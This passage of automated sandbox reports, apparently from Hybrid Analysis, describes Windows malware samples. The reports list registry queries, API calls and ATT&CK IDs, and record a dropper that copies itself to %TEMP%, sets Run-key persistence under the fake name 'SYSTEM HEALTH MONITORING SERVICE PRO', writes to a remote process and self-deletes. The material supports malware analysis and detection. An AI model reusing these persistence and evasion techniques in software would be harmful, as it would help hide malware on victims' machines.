\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00004576)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" queries volume information of \"C:\\\" at 00000000-00002776-0000010C-171607\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004576-0000010C-553850\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003216-0000010C-2396319", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004576)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" queries volume information of \"C:\\\" at 00000000-00002776-0000010C-171607\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004576-0000010C-553850\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00003216-0000010C-2396319", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006c00105b6c000b5b6c00000000000000000000006900000000019cdd22000000000000eb220095e1617752c11600feffffff435c657750596577aa000000b80000000a5b6c00085b6c0024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c647760d87375ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed6577325b6c00a06a3b758600000024df22005ce322000000000086008800a06a3b7524df2200916c3b75325b6c00a06a3b75a06a3b7594e3220002020000 (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002776)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006b00b8d56b00b3d56b00000000000000000000006800000000019cdc22000000000000ea220095e16177f1c61600feffffff435c657750596577aa000000b8000000b2d56b00b0d56b0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c647760d87375ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed6577dad56b00a06a3b758600000024de22005ce222000000000086008800a06a3b7524de2200916c3b75dad56b00a06a3b75a06a3b7594e2220002020000 (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf006677d60066776d21517770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00004576)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003216)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004576)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002776)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002776)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has a section named \".eh_fram\"\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" wrote 16252 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002776]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"a6195fe3e14ee149621d0645788c516bd2bf2b25d1ed59b5c2a2a504da863ea5.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0
https://hybrid-analysis.com/sample/559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0
Hybrid Analysis - Ransomware
{"size": 606103, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0", "sha256": "559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 137, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606107, "sha256": "29f8c0a7d7a8b82d3e0f3b6f2c6db3c58be05dc5dd8003e5c4165650ecbf4db0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005848", "name": "559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe", "normalized_path": "C:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe", "sha256": "559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0"}, {"uid": "00000000-00006020", "parentuid": "00000000-00005848", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe *", "sha256": "29f8c0a7d7a8b82d3e0f3b6f2c6db3c58be05dc5dd8003e5c4165650ecbf4db0"}, {"uid": "00000000-00005864", "parentuid": "00000000-00006020", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZTZXZG", "sha256": "29f8c0a7d7a8b82d3e0f3b6f2c6db3c58be05dc5dd8003e5c4165650ecbf4db0"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": 